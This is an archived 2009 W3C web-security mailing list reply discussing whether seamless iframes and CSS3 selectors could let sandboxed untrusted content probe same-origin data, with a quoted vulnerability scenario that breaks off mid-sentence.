W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: <sird@rckc.at>
Date: Sun, 6 Dec 2009 14:58:36 +0800
Message-ID: <8ba534860912052258t23a14a99xb4ede984d9ec6f0d@mail.gmail.com>
To: Maciej Stachowiak <mjs@apple.com>
Cc: sird@rckc.at, Ian Hickson <ian@hixie.ch>, public-web-security@w3.org
iirc sandboxed iframes cant frame.

in any case sandbox iframes are a joke unless you use data URIs.. that
should be cross origin anyway

On Dec 6, 2009 2:55 PM, "Maciej Stachowiak" <mjs@apple.com> wrote:

On Dec 5, 2009, at 10:27 PM, Maciej Stachowiak wrote: > > I think the attack
is that you can injec...
OK, I thought of a possible real vulnerability. A trusted host page on the
site wants to embed some untrusted user-generated content with the ability
to modify it, so it embeds it, hosted from its own server, using <iframe
sandbox="allow-same-origin">. This should prevent scripting and plugins, so
in theory it seems safe. But the untrusted content could embed a further
iframe with the seamless flag, embedding an arbitrary document from the
hosting service. It can then use CSS selectors to probe for data in that

Received on Sunday, 6 December 2009 06:59:17 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 6 January 2015 20:26:17 UTC